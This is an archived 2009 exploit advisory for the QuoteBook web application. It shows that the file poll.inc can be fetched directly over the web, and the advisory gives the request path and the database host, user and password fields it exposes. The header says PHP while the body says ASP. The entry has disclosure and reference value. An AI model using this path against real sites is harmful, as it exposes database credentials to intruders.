QuoteBook - Remote Configuration File Disclosure
Author: Moudi
type: webapps
platform: php
port:
date_added: 2009-01-06
date_updated: 2017-01-13
verified: 1
codes: OSVDB-51389;CVE-2009-0829;CVE-2009-0828;OSVDB-51388;OSVDB-51387
tags:
aliases:
screenshot_url:
application_url:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
==============================================================================
QuoteBook Remote Config File Disclosure Vulnerability
==============================================================================
[»] Script: [ QuoteBook ]
[»] Language: [ ASP ]
[»] Website: [ http://www.freedville.com/oss/download.php?package=QuoteBook ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ]
###########################################################################
===[ Exploit ]===
[»] http://localhost/[path]/poll.inc
$dbhost = "";
$dbusername = "";
$dbuserpass = "";
$default_dbname = ";
Author: Moudi
###########################################################################
# milw0rm.com [2009-01-07]